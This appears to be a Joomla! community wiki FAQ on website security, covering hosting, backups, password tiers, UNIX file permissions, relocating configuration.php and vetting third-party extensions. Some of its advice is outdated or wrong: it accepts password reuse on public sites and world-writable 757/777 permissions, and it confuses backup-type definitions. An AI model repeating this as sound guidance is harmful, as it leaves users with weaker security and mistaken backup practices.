* '''Proactive server management:''' Choose a host that provides real information about security compromises, rather than simply shutting your site down. Check their user forums for evidence of how they've responded to cracks in the past. A good host may for example, inform you immediately that a security breach has occurred and will quarantine the problem file for you, while leaving it there for further investigation. A poor host will shut your site down and provide very limited information on why. Watch out! All too many do this.

* '''Require raw log access:''' Be sure you have access to raw server logs. Reading these logs is a vital part of site security and recovery.

* '''Performance matters:''' Choose a host that limits the number of users per machine and the average CPU load per machine to some reasonable number (depending on hardware). Be sure they proactively move user sites as needed to balance load. Check the number of domains on a server using reverse IP lookup.

* '''Data center:''' Choose a host that manages it's own data center. Check the data center infrastructure, such as redundant Internet access, hot swappable backups, full daily backups, environment and access controls, emergency generators, etc.

* '''Know your neighbors:''' Check that your host is not at risk of having its IP addresses blocked because it hosts porn or SMAM sites.

* '''Consider Recommendations:''' Check this [http://forum.joomla.org/index.php/topic,6856.0.html list of recommended hosts].

* '''Grow with your site:''' As sites grow in complexity, resource requirements, and security requirements, they may need to be moved off of a shared server environment. At that point, good options include, 1) '''dedicated servers''' offer the best possible security and performance, but at the highest expense, 2) '''virtual servers''' offer almost all the advantages of a dedicated server, but the hardware and configuration cost is shared among multiple virtual servers.

==What are the best practices for site backups?==

: There are three traditional backup types--full, cumulative and differential.

'''Full Backups'''
: A complete backup of all associated files at a known point in time.

: Both of these are considered Incremental backups, they can be used independently of each other or in conjunction with each other but always relate back to a FULL backup.

'''Cumulative Backups'''
: This is a backup of the differences since the last FULL backup, so each cumulative backup gets bigger each cycle as it is also backing up data previously backup, since the last FULL backup.

'''Incremental Backups'''
: This is a backup of the changes since the previous backup of any type, i.e., full, cumulative, or incremental.

: If you site is not too large, then FULL backups are the way to go, once a week at least. If your content changes quite regularly or more importantly can not be recreated or is too costly to recreate, once a night or more may be more effective.

: If time, server resources, or the rate of data change is too high to successfully obtain a FULL backup every night then the incremental backups are needed.

: If you choose to use a cumulative backup following a weekly full, the backups each night will run quicker than a full backup, however as the week progresses, each nightly cumulative backup will increase in size and time, due to not only backing up the changes since last night's backup, but it also backing up all changes each night and previous nights since the last full backup was made. The benefit of this type of backup, in conjunction with full backups is the speed of restoration. To restore, you now only need to recover the most recent full and cumulative backups to fully recover all information.

: If time or server resources are paramount or data change overwhelms cumulative backups, turn to differential backups, this style of backup when used in conjunction with a full backup will provide a very similar level of protection, but restoration will be slower. Differential backups will only backup changed data since the last backup of any type, not since the last full backup, as with a cumulative backup. Thus, when restoring data, you will need to recover the full backup, then each differential backup in turn (oldest first) in order to fully recover all information. This method also has the drawback of recovering any legitimately deleted files, potentially "over-filling" the file-system.

'''Data Protection Best Practice says'''

# You should be able to completely recover from a catastrophic failure from at least two previous full backups. Just in case the most recent full backup is damaged, lost, or corrupt.
# A good backup regime should contain at least one full backup within a chosen cycle, normally weekly.
# A good backup practice is to store backups away from the current data location, preferably off site.
# Dynamic data should be backed up ''offline'' or ''hot'' to avoid ''fuzzy'' backups (data is changing as you back it up, potentially leading to related information not being in sync when backed up.

: For the average Web site, a daily or weekly full backup of both site files and database records is normally more than enough. Keeping a number of backups for a period of time is always a good plan, maybe keep each weekly backup for one month. This allows you to recover an old site in the case of emergencies or if for some reason you have local backup file corruption.

: There are many PHP and Perl scripts on the Web that can be automated through CRONTAB and can either email (if small enough) or FTP the backup files to an off- or cross- server location. Remember that to some degree with Joomla! you already have an instant backup of the core files, if you haven't modified core, the Joomla! distribution files can be easily restored. Then you need only worry about backing up changed files and the database.

==Where can I learn about vulnerable extensions?==
* See the [http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/ Vulnerable Extensions List]

==Where can I learn more about file permissions?==

* [http://www.joomlatutorials.com/faq/view/joomla_security_tips/joomla_and_unix_file_permissions_-_explanation/60.html Unix Permissions Primer]
* [http://www.joomlatutorials.com/faq/view/joomla_security_tips/joomla_and_windows_file_permissions_-_explanation/60.html Windows Permissions Primer]
* [http://www.joomlatutorials.com/faq/view/joomla_security_tips/permissions_under_phpsuexec/60.html Using phpSuExec]

==How do I setup a powerful password scheme?==

'''Overview'''

: Most users may not need more than 3 levels of passwords and webmasters no more than 5. Each level must be completely unrelated to the others in terms of which ids and passwords are used.

'''Directions'''

* '''Level 5 (Public)''' - is the password you use on public sites. It is not imperative that you use a different password on every site. In fact it's more effective to use a different username on every site than it is to use a different password truth be told! Knowing the username allows easy hacking...half the work is done! knowing the password is useless unless you know what account it goes to!

* '''Level 4 (Webmaster)''' - Reserved for SQL Only. this is a password that would only be used by SQL and limited to a specific database in SQL. The best way to protect SQL is by limiting each account to just being able to do the minimum that DB requires. In some cases it is even wise to have a read only account for display and a separate write account that the backend write functions use. But that doesn't apply to J! at all... for J! the best practice is to set up an individual account (not root for sure) that only has read and write access to the J! DB nothing else.

* '''Level 3 (Webmaster)''' - FTP and Server Access. these can be the same user:pass combo since both if compromised can do the most damage. doesn't matter if the backend or Cpanel is safe if the FTP is not and the same goes the other way!

* '''Level 2 (Personal Data Access)''' - This password should be used for any sites or locations that contain personal data with the exception of Banking (see level 1). these sites are often used for social engineering data such as medical records, service accounts and any financial records not directly related to banking! You want these to be secure but also different from the real threat of security...your money!

* '''Level 1 (Banking!)''' - this needs to be the most secure in fact if you have two different banks it actually pays to have a different user:pass for each just to be sure!

= Joomla! Core =

==How can I check my Joomla! installation's overall security and health?==

: Use the free Joomla extension, Joomla! Tools Suite (JTS), which is a Joomla! environment audit, maintenance and diagnostic application written in PHP. The JTS suite of tools can diagnose, report and advise on common installation, health and security issues, including performing several common performance and recovery actions.

: Project Home: http://joomlacode.org/gf/project/jts/

==Why should I immediately change the name of the default admin user?==

'''Overview'''

: All new Joomla installations start with a Super Administrator account called, 'admin'. During the installation process, you will be asked to give this account a password. That's great as far as it goes, but because the user name of this highly-confidential account is generally well known, 50% of the security of the username/password combination is already exposed. Now all anyone needs to do is guess the password and they're in.

: By changing the user name to something more difficult to guess, you greatly increase the difficulty of accessing the account. An attacker must correctly guess both the user name and password at the same time to gain access. This is several magnitudes more difficult than simply guessing the right password.

'''Directions'''

# Log into the Back End
# Select User Manager
# Select the 'admin' user record
# Change the value in username. (Good user names contain a mix of letters and numbers.)
# Save
# Remember the new username!
'''Bold text'''

==How do I turn off RG_EMULATION? [[Image:Compat_10.png]]==

'''Overview'''

: PHP's ''register_globals'' option was a bad idea and has been depreciated. Although Joomla's RG_Emulation is safer than PHP ''register_globals'', it's best not to allow any form of automatic variable assignments. Beginning with PHP6, this will not even be an option. Note that poorly-written extensions may fail with ''register_globals'' OFF. Best advise: Don't use such extensions!

'''Joomla! 1.0.13'''

: Beginning with the 1.0.13 release, Register Globals Emulation has been moved to the main configuration file and can be adjusting in the Back-end Administrator interface.

'''Joomla! 1.0.12 and earlier'''

: Edit the file, ''globals.php'', found in the root directory of your Joomla! site. At about line 23 change:

define('RG_EMULATION',1)

: to

define('RG_EMULATION',0)

==What do Error 1, Error 2, and Error 3 mean?==

'''Error 1 = FATAL ERROR: MySQL not supported...'''

You need to compile MySQL support into PHP or the MySQL server is down.

'''Error 2 = FATAL ERROR: Connection to database ...'''

Joomla! cannot talk to the database, most likly you have a typo in the username or password settings in ''configuration.php'', or you are trying to access a database table with the wrong table prefix.

'''Error 3 = FATAL ERROR: Database not found...'''

The database cannot be found. Check the database settings in ''configuration.php''

The MySQL variables in ''configuration.php'' (found in Joomla!'s root directory) can be modified to correct these problems.

For Joomla! 1.0.xx
$mosConfig_host = 'localhost';
$mosConfig_user = 'accountname__username';
$mosConfig_password = 'userpassword';
$mosConfig_db = 'accountname_dbName';
$mosConfig_dbprefix = 'jos_';

Modifying the ''$mosConfig_host'' to an IP Address of a remote host works for hosts that have separate MySQL servers from the client hosting servers.

==How do UNIX file permissions work?==

Unix/Linux file permissions can be confusing. The basic UNIX permissions come in three flavors;

Owner Permissions : Control your own access to files.
Group Permissions : Control access for you and anyone in your group.
Other Permissions : Control access for all others.

In Unix, when permissions are configured the server allows you to define different permissions for each of these three categories of users. In a Web server environment permissions are used to control which Web site owners can access which directories and files.

'''What do Unix permissions look like?'''

When viewing your files through an FTP client or from the servers command line;

filename.php username usergroup rwx r-x r-x

The first entry is the name of the file, the next entry is your username on the server, the second entry is the group that you are a member of and the last entry is the permissions assigned to that this file (or directory). If you notice, I have intentionally spaced out the permissions section, I have grouped the 9 characters into 3 sets of 3. This separation is key to how the permissions system works. The first set of 3 permissions (rwx) relate to the username seen above, the second set of 3 permissions (r-x) relate to the usergroup seen above and the final set of 3 permissions (r-x) relate to anyone else who is not associated with the username or groupname.

'''Owner (User) relates to username'''

The Owner (User) is normally you, these permissions will be enforced on your hosting account name.

'''Group relates to usergroup'''

The Group permissions will be enforced on other people that are in the same group as you, within a hosting environment, there is very rarely other people in the same group as you. This protects your files and directories from being made available to anybody else who may also have a hosting account on the same server as you.

'''Other relates to everyone else'''

The Other permissions, these will be enforced on anybody else on the server that is either not you or not in your group. So in a Web Serving environment, remembering that no-one else is normally in your group, then this is everybody else accessing the server except for you. Each of the three sets of permissions are defined in the following manner;

r = Read permissions
w = Write permissions
x = Execute permissions

Owner Group Other
r w x r w x r w x

As many of you already know, permissions are normally expressed as a numeric value, something like 755 or 644. so, how does this relate to what we have discussed above? Each character of the permissions are assigned a numeric value, this is assigned in each set of three, so we only need to use three values and reuse them for each set.

Owner Group Other
r w x r w x r w x
4 2 1 4 2 1 4 2 1

Now that we have a value that represents each permission, we can express them in numeric terms. The values are simply added together in the respective sets of 3, which will in turn give us just three numbers that will tell us what permissions are being set. If we are told that a file has the permissions of 777, this would mean that the following was true.

Owner Group Other
r w x r w x r w x
4 2 1 4 2 1 4 2 1

Thus...

4+2+1 4+2+1 4+2+1
= 7 7 7

The Owner of the file would have full Read, Write and Execute permissions, the group would also have full Read, Write and Execute permissions, and the rest of the world can also Read, Write and Execute the file. The standard, default permissions that get assigned to files and directories by the server are normally;

Files = 644
Directories = 755

These permissions would allow, for files;

644 = rw- r-- r--
Owner has Read and Write
Group has Read only
Other has Read only

and for directories;

755 = rwx r-x r-x
Owner has Read, Write and Execute
Group has Read and Execute only
Other has Read and Execute only

Now, things can get a little complicated when we start talking about shared Web Servers, the Web Server software will be running with its own username and groupname, most servers are configured for them to use either "apache" and "apache" or "nobody" and "nobody" as username and groupname. Here is the problem. Your Web Server runs as its own user, and this user is not you or in your group, so the first two sets of permissions do not apply to it. Only the world (other) permissions apply. Therefore, if you configure a permissions set similar to 640 on your website files, your Web Server will not be able to run your website files.

640 = rw- r-- ---
Owner has Read and Write
Group has Read only
Other has no rights

The Web server is assigned no permissions at all and cannot Execute, Write or more importantly, even Read the file to delivery its content to a website visitors browser. If a directory was to be assigned 750 permissions, this would have the same effect, because the WebServer does not even have permissions to read files in the directory, even if the files inside that directory had favorable permissions.

750 = rw- r-x ---
Owner has Read and Write
Group has Read and Execute
Other has no rights

Directories have an extra quirk, if a directory does not have the Execute permission set in the World set then even if Read and Write are set, if the program is not run as the user or group, it will still not be able to access the files within the directory. The Execute setting allows the program to "Execute" commands in the directory, so without it being on the program(in our case a Web Server) cannot execute the "Read" command, thus cannot deliver your file to the users web browser.

'''How Does this Relate to Joomla?'''

Good question, well in the first instance this would be important during the Web-Installer process.
If you can remember back to when you ran the Joomla! Web-Installer, we were looking for specific directories to be designated as writable. We see quite a numbers of posts either stating that there were problems during the install with permissions or asking what permissions are recommended. Some even consider the message, asking for "Writable" permissions to be too vague.

Unfortunately, as the Web-Installer does not know how your server is configured, then it cannot be more specific, however, once you understand the permissions settings and you know a little about Web Serving environments, you will actually find that the term ''writable'' is actually very specific and a more than adequate description of what Joomla! needs. Thinking back to the above information, you may remember that there are three places where ''write'' permissions maybe set;

Owner Writable
Group Writable
Other Writable

Also remembering that the Web Server generally doesn't run as your own user or in the same group. When you run the Web Installer from a browser, it is the Web Server trying to access the files, thus it is the "Other" permissions that will apply to it. If the "Other" permissions do not allow the Web Server to Read, Write or Execute commands in the Joomla! directories, you will receive the message saying that the directories are not ''writable''.

In this case, you will need to configure the Other permissions to be "7" on the directories listed in the Web Installer.
So your total permissions might be something like 757, in the worse case you might need to set 777. These very open permissions
maybe reset back to 755 after the installer runs to assist in the security of your directories and files.

757 = rwx r-x rwx
Owner has Read, Write and Execute
Group has Read and Execute
Other has Read, Write and Execute

Just to make things even more confusing, many hosting firms make use of software called phpsuExec or suExec, these tools change the way the Web Server runs, where the Web Server would not normally run as your username, in this case, it does. The use of the ''other'' permissions, may not be required, now you may only need to configure directories to be ''writable'' to your own username and groupname, this allows directory permissions to be set as 755 or 775 instead of 757 or 777.

755 = rwx r-x r-x
Owner has Read, Write and Execute
Group has Read and Execute
Other has Read and Execute

775 = rwx rwx r-x
Owner has Read, Write and Execute
Group has Read, Write and Execute
Other has Read and Execute

The Web Server will still need to Execute set for the username and Read, Execute groupname permissions set so that it can Execute the Read command on files inside the directory. Again, these permissions may be demoted back to 755 after the Web Installer completes. Thats the basics for directories covered, what about files? This is where things get a little simpler. Most of the files that Joomla! makes use of will be quite happy with the 644 default permissions.

644 = rw- r-- r--
Owner has Read, Write
Group has Read
Other has Read

This is valid if you do not have a need to Write to the files from the Web Server, the same rules apply as for directories if you do have this need. One file that you may like to have "Writable" to the Web Server is your configuration.php file. This is the Joomla! configuration file, if you plan on changing configuration through the Web Admin interface, then this file will need to be Writable to the Web Server.

If your server needed directory permissions to be set to "Other" Writable for the install then this file will probably also need to be 757 or 777. Leaving this file as 757 or 777 is dangerous though, as you are letting everyone have "Write" access, many Web Site exploits take advantage of this fact, so in general it is not recommended to leave this file with these permissions.

If your Web Server has one of the SU tools installed and you only needed to configure 755 on directories for the installation, then you will probably also only need to set 755 or 775 on this file to allow editing through the Admin interface, and these permissions are generally accepted as more secure than 757 or 777.

In conclusion, what permissions should be set for the Joomla! installation? Well, as you can see, it depends!

I know this isn't as helpful as you would have liked and it certainly is not a definitive answer, but in general, after the installation, any insecure "7" settings can be reset back to something more secure. For example:
Files = 644
Directories = 755

These permissions would allow, for files;

644 = rw- r-- r--
Owner has Read and Write
Group has Read only
Other has Read only

and for directories,

755 = rwx r-x r-x
Owner has Read, Write and Execute
Group has Read and Execute only
Other has Read and Execute only

If you have SSH shell access the following commands can be run from the command line to reset all files and directories back to the server defaults of 755 and 644. Change directories to the top directory (" / ") of your Joomla! installation, then run:

find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;

If you only have FTP access, this can be a very time consuming job, however, unless you changed more directories during the installation that was requested, you should only need to reset about 10 directories and the ''configuration.php'' file.

Keep in mind that to install any extensions or templates after the actual Joomla! installation you may need to elevate the default permissions again on the appropriate directories just for the installation period, you may then demote them again after the add-on is installed.

If you decide to use ''caching'' the cache directory will need to be ''writable'' by the Web server user to allow it to write its temporary files.

==What are the recommended file and directory permissions?==

Depending on the security configuration of your Web server the recommended default permissions of 755 for directories and 644 for files should be reasonably secure.

==How can I avoid using chmod 0777 to enable installs?==

On a private server with a small, controlled set of users, there is no need to use a chmod 777 to make the Joomla! folders writable in order to perform installs. You can set the server up so that both Apache and FTP have control of site files.

'''Directions'''

# Edit the Apache user.conf file and tell apache to run under the FTP account.
# chmod the entire site to 644 or 744. Apache should be able to run just fine that way.

'''Optional'''

# chgrp the entire web space to the FTP group so that only those with FTP access can write to the server.
# chmod the entire web space to 764 or 664 will be possible giving other users write access as well

==Isn't locating all Joomla! files inside public_html a security risk?==

'''Short answer'''

Potentially, yes. Your site can be secure, but you must be careful and vigilant.

'''Long answer'''

A common security principle is to create various security levels and then grant access at each level only as required. On UNIX servers this is done by setting the user, group, and world permissions on directories and files.

Typically, the most insecure directory on a UNIX server is the one serving Web files, usually called public_html. This is because it is publicly accessible, world-readable, and in the case of a CMS-powered site, possibly even world-writable. That status is the very definition of officially, totally, and utterly insecure.

As long as you want the entire world to view your public_html directory there is no problem. After all, that's exactly what it's designed to do. But if you want to hide anything, the plot thickens. If public_html contains configuration files with secret data, or scripts that write to databases, or scripts that modify other files, or scripts that append to logs, or scripts that store temporary data in caches, or scripts that support file and graphic uploads, or scripts that process form input, or scripts that process financial and personal data, this read-only directory becomes a world-accessible, read-write application.

If there are ANY vulnerabilities in ANY files in the public_html directory, the entire server is potentially vulnerable, and not just your Web site but possibly every Web site on your server. Such vulnerabilities give attackers access to the scripting engines used to run your site. PHP, Perl and other Web scripting languages are powerful and easy to use. If programming vulnerabilities allow an attacker to call arbitrary commands, your entire server could be toast.

One good way to block attackers, is to keep potential vulnerabilities behind a secure fence. For this reason, it is often recommended to only place files that require direct access from the Web in public_html. Other files should be loaded into applications using such functions as include andrequire. To access such files, attackers must first penetrate your server, such as by discovering a root username/password.

'''The incredible lightness of living outside the fence'''

To provide incredibly easy installation, Joomla! follows a different security model. It is possible to perform a complete Joomla! installation using nothing more than a Web browser pointed at the world-readable installation directory. An additional level of security is provided by requiring that you remove this installation directory after completing the install.

Granting a world-accessible installer the ability to write to files outside of public_html would be a huge security hole. Thus, by default every Joomla! file ends up in the world-accessible public_html directory. Not coincidentally, this is also the directory in which an angry planetful of would-be attackers are hoping to find your files.

Currently, most Joomla extensions also have limited support for file locations outside of public_html. This is a legacy of the Joomla! 1.0.x installation model.

'''Joomla! defense'''

Despite it's apparently vulnerable location, Joomla! uses various effective methods for blocking exploits. Chief among them is to add a line of code at the top of any PHP file that requires extra protection. This method is very effective as long as each and every file requiring such protection, has it. One vulnerable file exposes the whole site.

'''The challenge'''

The practice of placing everything in public_html, and then building a little fence inside each file can become an administrative nightmare. One vulnerable file exposes the entire server. This is a glaring example of an allow, then deny security model.

This model requires very careful upgrades, constant log reviews, and proactive plugging of new vulnerabilities as soon as they become known. (Since you have to beat the attackers, you'll be in a hurry, and may inadvertently do something stupid, potentially creating other vulnerabilities.)

During installations and upgrades, you must verify (or trust someone else to verify) every line of code, of every new file, for every known vulnerability. And because scripts can have unintended consequences on each other, you can not forget to test, test, test. Of course this is generally true for all software, but placing the entire application in public_html makes the issue extremely critical.

The recent wave of URL injection attacks against poorly-written third party extensions would have been much less successful if those files had been stored outside of public_html, and thus simply unavailable through URLs. Note that in many cases the actual vulnerabilities could still exist within the files, but being inside the fence (outside of public_html) they would not be exposed to URL injections.

To (Deny, then Allow), or (Allow, then Deny)?

The real problem with the above "all known" qualifier is that it is an allow, then deny model. In other words, we first give everyone access to every file and then deny access to specific files by adding a line of code.

Consider the logic for a password authentication script. We have essentially two choices:
# First allow all access, then deny any username/password combination that DOES NOT match the approved list.
# First deny all access, then allow any username/password combination that DOES match the approved list.

Obviously the second method is better. A passing familiarity with regular expressions shows that the first method is much more difficult to write securely. It fails anew each time a new variation of some attack is developed, and tends to require constant revisions. Over time, such revisions become so complex that the authentication system itself becomes a source of vulnerabilities.

Conceptually, the second method is an example of building a strong fence around your site (deny), and then granting access using a limited and well-defined set of criteria (then allow). If the script fails, the most likely result is that someone who should have access is blocked. That may be highly inconvenient, but it's not usually a security breach.

'''The good news'''

# In Joomla! 1.0.x, some extensions, and the Joomla! framework, give you the option of locating critical directories outside of public_html after you have completed the installation. Whenever possible you should do this.
# Joomla! 1.5 goes far in the right direction. It provides several new constants for specifying the location of particularly sensitive directories, including configuration, administrator, libraries, and installation.
# Joomla! 1.5 is able to run as an FTP account. This provides another method for protecting files on a file by file and directory by directory basis.

==How do I adjust Joomla 1.5 defines [[Image:Compat_15.png]]==

Edit your /includes/defines.php file. Below is the relevant code.

define( 'JPATH_ROOT' , implode( DS, $parts ) );
define( 'JPATH_SITE' , JPATH_ROOT );
define( 'JPATH_CONFIGURATION', JPATH_ROOT );
define( 'JPATH_ADMINISTRATOR', JPATH_ROOT . DS . 'administrator' );
define( 'JPATH_LIBRARIES' , JPATH_ROOT . DS . 'libraries' );
define( 'JPATH_INSTALLATION' , JPATH_ROOT . DS . 'installation' );

==How do I move confidential files outside of public_html?==

One challenge in Joomla! is ensuring that certain PHP files in public_html containing executable code or confidential data are protected from direct Internet access.

There are various ways to protect such files, but most are not optimal. Many users and developer groups, such as Gallery2 and Apache.org strongly recommend against keeping vulnerable files and confidential data inside public_html.

The following method seems to be the simplest and most elegant way to protect read-only files that, for whatever reason, must be stored in public_html. In this example, we protect configuration.php, perhaps the most confidential file of any Joomla! site.

'''Note:''' Using this method, even if the Web server somehow delivers the contents of PHP files, for example due to a misconfiguration, nobody can see the contents of the real configuration file.

'''Directions'''

1. Move configuration.php to a safe directory outside of public_html and rename it whatever you want. We use the name ''joomla.conf'' in this example.

2. Create a new configuration.php file containing only the following code:

<?php
require( dirname( __FILE__ ) . '/../joomla.conf' );
?>

'''Important!'''

Do not include blank lines or any characters (including blank spaces) before the php start tag or after the php end tag. If you make this mistake, you very likely see the following error.

Warning: Cannot modify header information - headers already sent by (output started at
/home/xxxxx/public_html/configuration.php:2) in /home/xxxxx/public_html/index.php on line 250

3. Make sure the new configuration.php file is not writable, so that it can not be overwritten by the Joomla! Web admin interface.

4. If you need to change configuration settings, do so manually in the relocated ''joomla.conf''.

See also How to adjust Joomla 1.5 defines

==How do I recursively adjust file and directory permissions?==

'''Using Joomla! Administration'''

In the Back-end, go to Site --> Global Configuration --> Server.

'''Using the UNIX shell'''

'''Note:''' The find command automatically assumes that it should start from the current directory. To be safe, go to your public_html directory and specify a path as the first argument. Some shells, such as bash on Apple OS X, must have a path specified in the find command.

find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;
chmod 707 images
chmod 707 images/stories
chown apache:apache cache

'''Notes:'''
# Test all third party extensions after changing permissions.
# You may need to reset write permissions to install more extensions.

==How can I set the administrator directory to use an SSL server (https)? [[Image:Compat_10.png]]==

Use Joomla version 1.5

A standard Joomla! 1.0.x installation does not support SSL for individual directories, however there are various (elegant and not so elegant) hacks posted in the forums.

Note that earlier techniques involving the variable $mosConfig_live_site are depreciated, and will not work with current Joomla! versions due to increased security enhancements.

'''More Help'''
# [http://www.netshinesoftware.com/security/using-an-ssl-certificate-with-your-joomla-website.html Netshine Software, Ltd: Using an SSL Certificate with your Joomla Website]

==Why isn't restricting access by IP recommended?==

Restricting site access by IP address is not particularly effective longterm as many exploits are enacted from hijacked machines or via proxies, masking the real attacker's actual IP Address. Attackers can attack from many different compromised machines. Blocking them will block the legitimate owners of that IP, but may not block the attackers.

= Joomla! Extensions =

==Why are there vulnerable extensions?==

: Anyone may write and distribute a Joomla! extension. As a service to the global community, this freedom is actively encouraged and supported by the Joomla! Core team. Due to the openness and popularity of the Joomla! project, there are a wide variety of extensions offering a vast array of features. The quality and breadth of Joomla! extensions is one of the main advantages of Joomla.

: However this freedom comes with a price. It requires individual responsibility, and can survive only where a majority of participants act responsibly. Joomla's success has led to unwanted attention from malicious types, such as script kiddies who run simple, automated scripts in an effort to find and deface others' Web sites.

: It is important to note that, script kiddies unintentionally perform a valuable service. They help us identify vulnerable extensions and poorly configured servers that might otherwise remain open to more serious threats.

==What is a vulnerable extension?==

A vulnerable extension is one that has been found to contain (or contribute to) a security vulnerability.

Vulnerable extensions are not necessarily poorly-coded. As the Web evolves, technical requirements and commonly accepted coding practices change. Active projects release new versions of their extensions as requirements change. For this reason, it is important to:

# Know the version numbers of all installed extensions.
# Use only the latest stable version of all extensions.
# Completely remove all files of insecure or unused extensions.

==How do I choose secure extensions?==

: The most important thing anyone can do is make good decisions regarding the extensions they choose to use on a site. Once an insecure or malicious extension is installed you should consider your entire site compromised. There is NO POSSIBLE WAY to protect or stop a component from accessing database tables it should not be accessing. There is no possible way to stop a component from sending all of the information it found back to a cracker website. Once an insecure or malicious component is installed, your entire site is insecure.

: With all of that said, here are some pretty easy tips for making good choices regarding the extensions you install:

1. When was the last version released?

: If it has been over a year, consider the project abandoned and find something else. Do not install old components.

2. What kind of release is it? (Stable, Release Candidate (RC), Beta, Alpha)

: For production sites you should be sticking to Stable releases as much as possible. If you cannot wait until a Stable release has been made available, Release Candidates are the only other option you should consider. I would not suggest anyone install any Beta or Alpha extensions on a production site. This means they still have bugs, they have not been tested enough, and could have any number of inconvenient bugs or security issues that have not been fixed or worse, found.

3. Does the extension have a history of good security practices?

: This is obviously a bit more subjective but it is still a very valid gauge of future trustworthiness. It requires a bit of investigation and research. Look around their download pages and archives, are there many security release or patches? Are there a lot of reports of cracking activity through this extension? Are the developers experienced and security conscious? What do other community members think of this extension? One example that comes to mind that has little to do with Joomla itself (which makes it a fair example) is phpBB. This script has had more security issues than I could get my head around and there routinely seems to be newly disclosed issues. Because of this, I would never use phpBB. In my opinion its is not trustworthy and there is a high probability that there will be more major security issues.

4. Is there a support community for this extension?

: This is very important for usability and security awareness. If there is a support community for an extension there is a better chance of security issues being known and dealt with. A support community means that people would like to continue using the extension and that they care about the extension. This furthers the chance that security issues will be found, disclosed, and dealt with promptly.

5. Is there only a Mambo version of this extension?

: While this does not in itself make an extension insecure but is rather a gauge of support, how recently the last realease was, and future support. There is a pretty narrow chance that Mambo components will be supported in 1.5 so save yourself the trouble and find a component made to work with Joomla. It will make your life easier.

6. Is the extension generally bug free?

: I hinted on this a little bit in number three but I think it is worth discussing in more depth. While it is almost impossible for an extension to be completely bug free, the smaller the number of bugs, the better. If there are bugs in the software it means there are mistakes in the software. The more mistakes, the higher risk of usability issues and security issues. Security issues are often a result of not one bug, but several bugs or bad practices. For example, the recent 3rd party vulnerabilities that allow for remote file inclusion are a result of:

'''Bad Practices:'''

# Having PHP's Register Globals enabled.
# Using out of date or abandoned extension.
# No other security checks enabled for PHP. (url_fopen off, open_basedir restrictions, disabled PHP functions)
# Poorly configured file permissions.
# No request filtering or software "firewall". (such as mod_rewrite rules or mod_security Apache modules)

'''Bugs:'''

# Not including defined('_VALID_MOS') or die... statements
# Poorly constructed include() statements.

'''Although the Joomla! core is secure when configured correctly, third party extensions come in all flavors of age and quality. Unless you absolutely trust the extension developer, always review the code should before installing. The following is a list of typical areas of concern.'''

1. How complex is the extension?

: The larger it is, the more likely it is to have problems, and the more carefully you should review it. If you can't tell what it's doing, you should not trust it.

2. Does the extension read or write files to your server?

: Programs that read files may inadvertently violate access restrictions you've set up, or pass sensitive system information to crackers. Programs that write files have the potential to modify or damage existing files, or introduce trojan horses.

3. Does the extension interact with other programs on your system?

: For example, many extensions send e-mail in response to a form input by opening a connection with the sendmail program. Is it doing this in a safe way?

4. Does the extension run with suid (set-user-id) privileges?

: In general this is very dangerous; extensions need an excellent reasons for doing this.

5. Does the extension validate all user input, such as in form fields and in the URL?

6. Does the extension use explicit path names when invoking external programs?

: Relying on the PATH environment variable to resolve partial path names is a dangerous practice.

7. Is the extension secure against direct access throught the URL?

: For example: www.yoursite.com/components/com_bad_extension.php?lots_of_bad_code_here

8. Is the extension secure against remote file inclusions?

9. Is the extension secure against SQL injections?

10. Is the extension secure against Cross Site Scripting (XSS)?

11. Does the extension need PHP register_globals ON, or Joomla! RG Emulation ON?

: If so, then it is probably violating number 7 above.

12. Does the extension provide higher database access to less privileged users?

: For example does it allow guests or registered users to view data that only publishers or administrators should be able to see?

==Why does the Extensions site include insecure extensions?==
'''
Overview'''

The Joomla! Extensions site exists as a free service to the community. Anyone can post extensions there and extensions exist at all levels of quality and maturity.

If an extension is found to contain vulnerabilities, it will be removed from the site until a safer version is released, but there is no guarantee that the vulnerabilities of every extension have been discovered or reported.

To be safe, you must verify the security of every extension you install.

Below is the text of the Joomla! Extensions site disclaimer. Ignore it at your peril.

'''Disclaimer'''

: The extensions and reviews listed in this area have been submitted by the community and their listing does not constitute or imply endorsement, recommendation, or favouring by Joomla!/OSM.

: This content is provided as a free service to our visitors, and, as such, Joomla!/OSM cannot be held liable for the accuracy of the information. Visitors wishing to verify that the information is correct should contact the parties responsible for authoring the content and/or development of the extension.

==Why is there a warning in the extensions install screen?==

It's just a warning! You are of course free to install any extension you want onto your own site, but remember that '''YOU''' are responsible for the safety of your site and the quality of the applications you install.

The vast majority of reported Joomla! vulnerabilities are through poorly-written or obsolete versions of third party extensions that should not have been left on the server. Therefore, before installing anything carefully evaluate the quality of the extension's code.

The [[Vulnerable Extensions List]] is a valuable source of information on what '''NOT''' to install.

==Why isn't un-publishing a vulnerable extension enough to protect my site?==

'''Overview'''

: Simply removing the menu links to an extension, or unpublishing a module is NOT enough to protect your site! As long as the extension's files exist on your server, you are vulnerable. Note how in the following examples an attacker can bypass the Joomla! index file to directly target any file, of any extension.

www.your_site.org/components/com_bad_component/vulnerable_file.php
www.your_site.org/modules/mod_bad_module/vulnerable_file.php

'''Directions for removing a vulnerable extension'''

1. Make a list of files to remove

: If you can locate it, read the extension's xml file to determine exactly which directories, files, and database tables were added to your system. The xml file is in the original zip archive used during the extension install process. For example, the zip archive for an extension called mod_vulnerable, would contain an xml file called, mod_vulnerable.xml, and might contain a list of files such as the following:

mod_vulnerable.php
mod_vulnerable/vulnerable_file.txt
mod_vulnerable/another_vulnerable_file.txt
mod_vulnerable/yet_another_vulnerable_file.txt
mod_vulnerable/index.html

2. Uninstall via the Joomla Installer:

: Using the Installer in the Joomla! Administrator backend, uninstall the vulnerable extension. You may also need to uninstall related modules, components, or plugins.

3. Check that the uninstall process was complete:

: Don't trust the extension to safely remove all of it's files. Compare directories and files on your system to the extension's xml list to ensure that all related files were actually removed.

4. Optionally, remove related database tables:

: Check your database and remove any tables created by the extension. To ease the upgrade process to new versions, many uninstall scripts do not remove related database tables. You can find the list of tables in each extension's xml file. (If you plan to install a safer, compatible version of the same extension and you want to reuse existing data, you can usually leave the database tables as is.)

= Apache =
'''Covers information on Apache Web server, Apache modules, .htaccess files, etc.'''

==What is Apache modSecurity?==

'''Overview'''

ModSecurity is an Apache module that functions as an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure. It is also an open source project that aims to make web application firewall technology available to everyone.

